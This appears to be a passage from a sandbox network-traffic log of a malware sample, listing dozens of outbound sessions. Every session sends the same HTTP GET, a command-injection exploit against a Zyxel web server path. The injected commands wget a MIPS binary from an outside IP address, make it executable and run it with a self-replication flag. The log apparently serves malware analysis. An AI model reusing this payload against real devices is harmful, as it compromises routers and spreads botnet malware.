                                                        Jan 28, 2024 10:13:00.559015036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6399192.168.2.1441386111.21.99.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.559079885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6400192.168.2.145409049.43.112.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.559113026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6401192.168.2.1456444217.4.195.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.559149981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6402192.168.2.1444052197.119.139.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.559175968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6403192.168.2.1444894113.211.150.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.559222937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6404192.168.2.145731860.240.113.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.559242964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6405192.168.2.1452242143.126.249.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.559289932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6406192.168.2.1452582136.66.208.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.559329987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6407192.168.2.143480023.88.87.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.559375048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6408192.168.2.145164031.191.24.118443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.559420109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6409192.168.2.1438194149.90.38.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.559442043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6410192.168.2.1434518114.121.223.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.559490919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6411192.168.2.1434216101.43.213.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.559521914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6412192.168.2.1447346101.149.72.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.559544086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6413192.168.2.1451152136.52.104.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.559585094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6414192.168.2.145220257.171.217.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.559612036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6415192.168.2.145620638.203.202.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.559642076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6416192.168.2.145733467.234.174.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.559669018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6417192.168.2.1459254178.68.110.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.559740067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6418192.168.2.145757290.70.37.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.559782028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6419192.168.2.1442728213.179.215.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.559828997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6420192.168.2.144952234.53.205.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.559845924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6421192.168.2.1437684148.187.174.118443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.559876919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6422192.168.2.1455222192.237.27.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.559923887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6423192.168.2.1455154134.24.46.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.559973001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6424192.168.2.144764057.164.162.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.559988976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6425192.168.2.143410466.9.230.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.560053110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6426192.168.2.1450838221.254.90.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.560072899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6427192.168.2.1439116188.141.234.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.560108900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6428192.168.2.1458182171.83.106.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.560142040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6429192.168.2.1450770165.48.56.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.560195923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6430192.168.2.1449690164.83.26.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.560229063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6431192.168.2.144499294.189.250.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.560266018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6432192.168.2.1441652131.117.82.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.560314894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6433192.168.2.1440892165.148.252.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.560340881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6434192.168.2.144959271.92.53.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.560378075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6435192.168.2.143581425.231.58.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.560422897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6436192.168.2.144725235.196.211.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.560461044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6437192.168.2.145627849.130.195.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.560488939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6438192.168.2.143420454.162.104.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.560538054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6439192.168.2.146069474.249.8.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.560585022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6440192.168.2.1449936122.204.169.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.560616016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6441192.168.2.1448372195.123.149.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.560651064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6442192.168.2.143808223.179.170.131443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.560674906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6443192.168.2.1443446174.71.33.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.560695887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6444192.168.2.1443746176.16.143.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.560740948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6445192.168.2.144947280.158.54.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.560787916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6446192.168.2.1455620200.177.84.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.560827017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6447192.168.2.145700288.98.175.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.560859919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6448192.168.2.145705084.129.224.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.560900927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6449192.168.2.1444548138.102.139.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.560939074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6450192.168.2.14383365.182.136.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.560980082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6451192.168.2.1456624165.212.143.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561012030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6452192.168.2.1452138160.78.63.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561045885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6453192.168.2.14379681.194.231.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561079025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6454192.168.2.1459752179.176.38.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561111927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6455192.168.2.145689657.174.96.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561147928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6456192.168.2.1452966106.252.35.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561187029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6457192.168.2.1459784124.145.208.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561222076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6458192.168.2.1444240206.228.125.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561261892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6459192.168.2.144592493.55.251.87443
                                                        TimestampBytes transferredDirectionData
